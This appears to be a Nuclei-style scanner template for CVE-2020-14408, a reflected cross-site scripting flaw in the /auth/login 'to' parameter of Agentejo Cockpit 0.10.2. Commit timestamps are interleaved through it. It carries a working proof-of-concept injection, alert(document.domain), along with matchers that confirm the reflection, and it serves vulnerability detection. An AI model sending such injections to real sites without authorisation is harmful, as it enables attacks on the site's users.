2022-07-06 06:22:49 +00:00
id : CVE-2020-14408
info :
2022-09-08 13:28:46 +00:00
name : Agentejo Cockpit 0.10.2 - Cross-Site Scripting
2022-07-06 06:22:49 +00:00
author : edoardottt
severity : medium
2022-09-08 13:28:46 +00:00
description : Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability.
2023-04-12 10:55:48 +00:00
reference :
- https://github.com/agentejo/cockpit/issues/1310
- https://nvd.nist.gov/vuln/detail/CVE-2020-14408
2022-07-06 06:22:49 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2020-14408
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00113
2023-08-31 11:46:18 +00:00
epss-percentile : 0.44064
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:*
2022-07-06 08:40:55 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:22:36 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : agentejo
product : cockpit
2022-12-07 06:02:41 +00:00
tags : cve,cve2020,cockpit,agentejo,xss,oss
2022-07-06 06:22:49 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-06 06:22:49 +00:00
- method : GET
path :
2022-07-06 08:40:55 +00:00
- "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"
2022-07-06 06:22:49 +00:00
matchers-condition : and
matchers :
- type : word
2022-07-06 08:40:55 +00:00
part : body
2022-07-06 06:22:49 +00:00
words :
2022-07-06 08:40:55 +00:00
- "redirectTo = '/92874';alert(document.domain)//280';"
2022-07-06 06:22:49 +00:00
- type : word
2022-07-06 08:40:55 +00:00
part : header
2022-07-06 06:22:49 +00:00
words :
2022-07-06 08:40:55 +00:00
- "text/html"
- type : status
status :
- 200